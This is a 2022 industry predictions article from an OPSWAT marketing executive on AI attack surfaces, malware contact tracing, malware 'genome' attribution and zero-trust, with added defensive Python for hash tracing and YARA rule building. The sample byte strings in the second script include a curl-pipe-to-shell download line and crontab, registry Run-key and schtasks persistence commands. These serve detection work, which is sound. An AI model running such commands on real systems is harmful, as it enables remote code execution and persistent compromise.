Industry executives and experts share their predictions for 2022. Read them in this 14th annual VMblog.com series exclusive.
New Attack Surfaces and Zero-Trust
By Chip Epps, VP of Product Marketing at OPSWAT
We entered 2021 with a renewed focus on security after
navigating a world of hybrid work and myriad cybercriminals leveraging new
pandemic-driven attack vectors. And while the public and private sectors paid
closer attention to these threats and began to retrospectively assess the
security processes and controls that had been rapidly put in place at the start of
the pandemic, we failed to pay close attention to the exploitable attack
vectors in critical infrastructure industries that could cause major
operational and economic disruption, as Colonial Pipeline, the JBS food supply and a
Florida water system showed, to name a few.
As the world attempts to stabilize on the road back to
economic recovery, 2022 will present its own cybersecurity challenges even with
government-driven orders to increase the protection of critical infrastructure
sectors. Let's take a look at some of those challenges we foresee in the coming
year, as well as the behavioral trends from organizations looking to combat
them.
AI systems will offer new attack surfaces
With the increased adoption of technologies such as Artificial
Intelligence (AI) and 5G, we will see increased demand for autonomous
systems across production and logistics environments, including vehicles and
drones used for B2B and B2C purposes such as package delivery. More
sensors in these systems mean more data inputs feeding AI-driven actions. We
may very well see the software and data that power these systems
targeted by attackers, forcing organizations to think through the implications
should these systems be compromised or sabotaged. As cybercriminals try to stay
one step ahead, the AI systems that support modern businesses become a very
plausible attack surface through manipulation of the data they consume: poisoned
training data, falsified sensor inputs, or malware-laden files that "trick" the
model into responding a certain way. As the world has struggled with supply chain
challenges, attackers have seen just how disruptive an attack on AI systems in this
capacity could be, and will leverage it to cause disruption and mass ripple effects
across operational channels.
This was a missed 2021 prediction according to Forrester,
which had originally predicted that a fifth of enterprises would use commercial drones
to automate business operations. But due to the immediate pandemic challenges
in 2020 and 2021 with existing supply chains, adoption stalled. Going into
2022, however, we have increased acceptance of machine-enhanced operations and
expanded use of robotics to combat ongoing staff shortages and more,
setting the stage for both streamlined operations and increased risk.
Concepts of malware contact tracing
Rooted in the philosophy of detection and impact analysis, lessons
learned from the COVID-19 pandemic have implications for the cyber security
community: containment applies to pandemics as well as to cyberattacks. An
important preventive activity for organizations, often part of a
proactive or early-warning process, is analyzing
malware in a secured, sandboxed environment to study its behavior and how
it might spread (e.g. how it persists, escalates privileges, and moves laterally),
and ultimately to put up more defensible barriers.
With advanced threats and malware increasing in
complexity, we may see a need for broader adoption of digital signing and
chains of trust. This may take the form of "next-gen" Content
Disarm and Reconstruction (CDR) technology, and of new digital "sec-bots"
inserted into digital assets to proactively suppress the malicious attributes
of existing files. Similar to pandemic-driven concepts of contact tracing and
location tracking, these ideas may well extend to digital assets and the infrastructure
they pass through, such as networks and storage, to identify every touchpoint
of a piece of malware and to certify core digital assets as "safe and acceptable".
The result is a much richer "trust" mark that helps define which assets have been
inoculated and what risk those infrastructures and digital assets face from exposure to
unverified third parties.
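As an added illustration of the contact-tracing idea (example code written for this page, not OPSWAT's or the author's), the Python below takes constructed file-movement records (hypothetical key=value log lines with invented host names and shortened hash placeholders), treats one SHA-256 as the pathogen, and works out patient zero, every host that touched the file, the hosts that later received other files from an exposed host, and which of those files need re-verification before they can carry a trust mark.

```python
"""Contact tracing for a malicious file over file-movement records.
Added example, not OPSWAT's or the author's code. The log format and hosts
are constructed; in practice the records would come from EDR, DLP, proxy or
file-server audit logs."""
from datetime import datetime, timezone
import re

# Constructed sample records: who handed which file (by SHA-256) to whom, when.
# Hashes are shortened placeholders, not real sample hashes.
SAMPLE_LOG = """\
2021-11-03T09:30:00Z src=fileserver01 dst=ws-200 sha256=d4c3b2a1 name=budget.xlsx
2021-11-03T09:58:02Z src=mail-gw dst=ws-045 sha256=9f86d081 name=invoice.docm
2021-11-03T10:05:40Z src=ws-045 dst=fileserver01 sha256=9f86d081 name=invoice.docm
2021-11-03T10:07:15Z src=ws-045 dst=fileserver01 sha256=1b2c3d4e name=notes.txt
2021-11-03T10:20:09Z src=fileserver01 dst=ws-112 sha256=9f86d081 name=invoice.docm
2021-11-03T10:22:51Z src=fileserver01 dst=ws-113 sha256=7e7e7e7e name=report.pdf
2021-11-03T11:00:33Z src=ws-112 dst=nas01 sha256=9f86d081 name=invoice.docm
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"sha256=(?P<sha256>[0-9a-f]+) name=(?P<name>\S+)$"
)


def parse_log(text: str) -> list:
    """Parse the key=value lines into dicts sorted by time; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        records.append(rec)
    return sorted(records, key=lambda r: r["ts"])


def trace(records: list, bad_hash: str) -> dict:
    """Contact-trace one malicious hash.

    exposed:        hosts that sent or received the file, with first-seen time
    secondary:      hosts that received *other* files from an exposed host after
                    its exposure (what an infected host produced may carry the payload)
    suspect_hashes: hashes of those other files, to be re-scanned or re-signed
    """
    exposed = {}
    for r in records:
        if r["sha256"] == bad_hash:
            for host in (r["src"], r["dst"]):
                exposed[host] = min(exposed.get(host, r["ts"]), r["ts"])
    first = next((r for r in records if r["sha256"] == bad_hash), None)
    patient_zero = first["src"] if first else None  # earliest sender of the file

    secondary, suspect = {}, set()
    for r in records:
        if r["sha256"] == bad_hash or r["src"] not in exposed:
            continue
        if r["ts"] < exposed[r["src"]]:
            continue  # sent before the source was exposed: not a contact
        suspect.add(r["sha256"])
        if r["dst"] not in exposed:
            secondary[r["dst"]] = min(secondary.get(r["dst"], r["ts"]), r["ts"])
    return {"patient_zero": patient_zero, "exposed": exposed,
            "secondary": secondary, "suspect_hashes": suspect}


if __name__ == "__main__":
    result = trace(parse_log(SAMPLE_LOG), "9f86d081")
    print("patient zero:", result["patient_zero"])
    for host, ts in sorted(result["exposed"].items(), key=lambda kv: kv[1]):
        print(f"exposed   {host:<13} first seen {ts:%H:%M:%S}")
    for host, ts in sorted(result["secondary"].items(), key=lambda kv: kv[1]):
        print(f"secondary {host:<13} contact at {ts:%H:%M:%S}")
    print("re-verify hashes:", sorted(result["suspect_hashes"]))
```

The time check matters: a file the file server handed out before it ever saw the malicious document is not a contact, so `ws-200` stays out of both lists, while `ws-113` is flagged only because its download happened after the server's exposure. Hosts in `secondary` and hashes in `suspect_hashes` are the ones whose trust mark should be withheld until they are re-scanned.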
The idea of a "digital genome" will emerge and expand
Going into the new year, we may see the emergence of a "digital
genome" (i.e. digital DNA) to better track and attribute certified
"cyber-engineered" modifications. Cyber-attack groups and specific bad actors
often reuse code components and TTPs based on their historical success,
or simply as a matter of expediency, and with that comes a unique signature,
like a sequence in their DNA. This could be a simple algorithm unique to an
attack group, or a clone of elements from previous successful attacks they are
familiar with. The practice of threat intel sharing has been very successful as
the industry quickly realized that combating cyber threats is a global issue.
Hashes are specific to files and have served the community well in managing
distinct threats and threat families, but a hash changes whenever a single byte of
the file does, so every recompiled or repacked variant looks new. There will be a
need to bring this concept to a higher level: doing more to associate malware with its
source or creator, like sequencing a gene, so that organizations can more quickly
remediate the vulnerabilities and risks that group targets. With the idea of a "digital
genome," malware researchers and reverse engineers can identify these distinctions and
write rules in languages like YARA that match the metadata and behavioral indicators
attributed to a given malware author, rather than one file's hash.
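An added example (not the author's or OPSWAT's code) of why a file hash is too narrow a unit and what a coarser "genome" fingerprint looks like: the Python below uses constructed byte strings standing in for code sections (a reused loader, a group's persistence routine and a per-build C2 string; nothing here is real malware) and shows that SHA-256 changes when one byte changes, that byte n-gram shingling with Jaccard similarity still clusters the variants, and that the byte runs two variants share can be lifted straight into the strings section of a YARA rule.

```python
"""Beyond file hashes: fingerprinting reused code so variants cluster together.
Added example, not OPSWAT's or the author's code. The samples are constructed
byte strings standing in for code sections, not real malware."""
import difflib
import hashlib

# Constructed "code sections". The loader and the group's post-exploitation
# routine are reused across a group's builds; the C2 string changes per build.
SHARED_LOADER = (
    b"entry: push ebp | mov ebp,esp | sub esp,0x40 | "
    b"xor ecx,ecx | loop: mov al,[esi+ecx] | xor al,0x5A | rol al,3 | "
    b"mov [edi+ecx],al | inc ecx | cmp ecx,edx | jl loop | "
    b"call resolve_api_by_hash | push 0x7C0DFCAA | call eax | leave | ret"
)
GROUP_TTP = (
    b"persist: reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    b"/v Updater /d %APPDATA%\\svchost.exe | sched: schtasks /create /sc minute "
    b"/mo 15 /tn Updater | lateral: wmic /node: process call create"
)
SAMPLE_A = SHARED_LOADER + b" | c2=http://203.0.113.7/gate.php | " + GROUP_TTP
SAMPLE_A2 = SHARED_LOADER + b" | c2=http://198.51.100.23/p.php | " + GROUP_TTP + b"\x00" * 32
SAMPLE_B = (  # unrelated family: different loader, different TTPs
    b"#!/bin/sh\ncurl -s http://192.0.2.9/x.sh | sh\n"
    b"crontab -l | { cat; echo '*/10 * * * * /tmp/.x'; } | crontab -\n"
)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def shingles(data: bytes, n: int = 8) -> set:
    """Set of every n-byte window: a fingerprint insensitive to where bytes sit in the file."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if (a | b) else 0.0


def attribute(sample: bytes, library: dict, threshold: float = 0.5):
    """Best-matching reference fingerprint as (group, score); (None, score) below threshold."""
    s = shingles(sample)
    best, best_score = None, 0.0
    for group, fingerprint in library.items():
        score = jaccard(s, fingerprint)
        if score > best_score:
            best, best_score = group, score
    return (best if best_score >= threshold else None), best_score


def shared_segments(a: bytes, b: bytes, min_len: int = 16) -> list:
    """Contiguous byte runs common to two samples: the reused 'genes'."""
    sm = difflib.SequenceMatcher(None, a, b, autojunk=False)
    return [a[m.a:m.a + m.size] for m in sm.get_matching_blocks() if m.size >= min_len]


def yara_rule_from_samples(name: str, a: bytes, b: bytes) -> str:
    """Emit a YARA rule whose strings are the hex of the segments two variants share."""
    segments = shared_segments(a, b)
    if not segments:
        raise ValueError("no shared segments long enough to build a rule from")
    lines = [f"rule {name}", "{", "    strings:"]
    for i, seg in enumerate(segments):
        hexstr = " ".join(f"{x:02x}" for x in seg)
        lines.append(f"        $s{i} = {{ {hexstr} }}")
    lines += ["    condition:", f"        {max(1, len(segments) // 2)} of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    print("sha256 differs:", sha256(SAMPLE_A) != sha256(SAMPLE_A2))
    print("A vs A2:", round(jaccard(shingles(SAMPLE_A), shingles(SAMPLE_A2)), 2))
    print("A vs B :", round(jaccard(shingles(SAMPLE_A), shingles(SAMPLE_B)), 2))
    library = {"group_alpha": shingles(SAMPLE_A), "group_beta": shingles(SAMPLE_B)}
    print("A2 attributed to:", attribute(SAMPLE_A2, library))
    print(yara_rule_from_samples("group_alpha", SAMPLE_A, SAMPLE_A2))
```

The 8-byte window and the 0.5 threshold are tuning choices for this toy, not standards; production tooling uses established similarity digests such as ssdeep, TLSH or import hashes for the same purpose. The caveat a reverser would add: a shared segment only supports attribution if it is not a public library, a packer stub or copied open-source code, so shared segments should be checked against a known-benign corpus before they become a rule's strings.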
Zero-trust security will expand
With more hyper-distributed, micro-segmented environments,
where security zones are driven down to the individual level and architectures
change fundamentally as a result, we can expect to see zero-trust security frameworks
deployed at the individual and device level of organizations. Currently, we see
zero-trust principles applied through the isolation of networks, distributed
applications, web servers, departmental teams, and more. At the user and device
level, we can expect to see zero-trust principles implemented via software
deployments that segment users from networks regardless of device, so that every
access request is evaluated on identity and device posture rather than network
location, to keep organizations safe and secure.
While no one anticipated the lasting effects of the pandemic
or the major cyber events of 2021, they have certainly accelerated digital
transformation and increased awareness of emerging threats. They have also changed
the rate at which we develop and adopt new technology, and the public
and private sectors' response to an evolving threat landscape. As we march
forward into the new year, we are hopeful we will see these critical technological
and behavioral changes come into play.
ABOUT THE AUTHOR
Chip Epps, VP Product Marketing, joined OPSWAT
in 2021 with a 15+ year security career in both Product Management and Product
Marketing and is CISSP certified. He's focused primarily on emerging product
categories and associated go-to-market strategies spanning security domains
including Endpoint, Datacenter, Network, Gateway, Cloud, IAM, SOAR and Threat
Intelligence. Prior to a career in security, Chip spent 10+ years in IT
operations and service delivery across numerous market segments including
Healthcare, Finance, and Government, and is ITIL certified. Chip received his
BME (Mechanical Engineering) from Georgia Tech, was certified Chief Engineer by
Naval Reactors (submarine qualified), and obtained his MBA with a focus on new
ventures from the University of San Diego.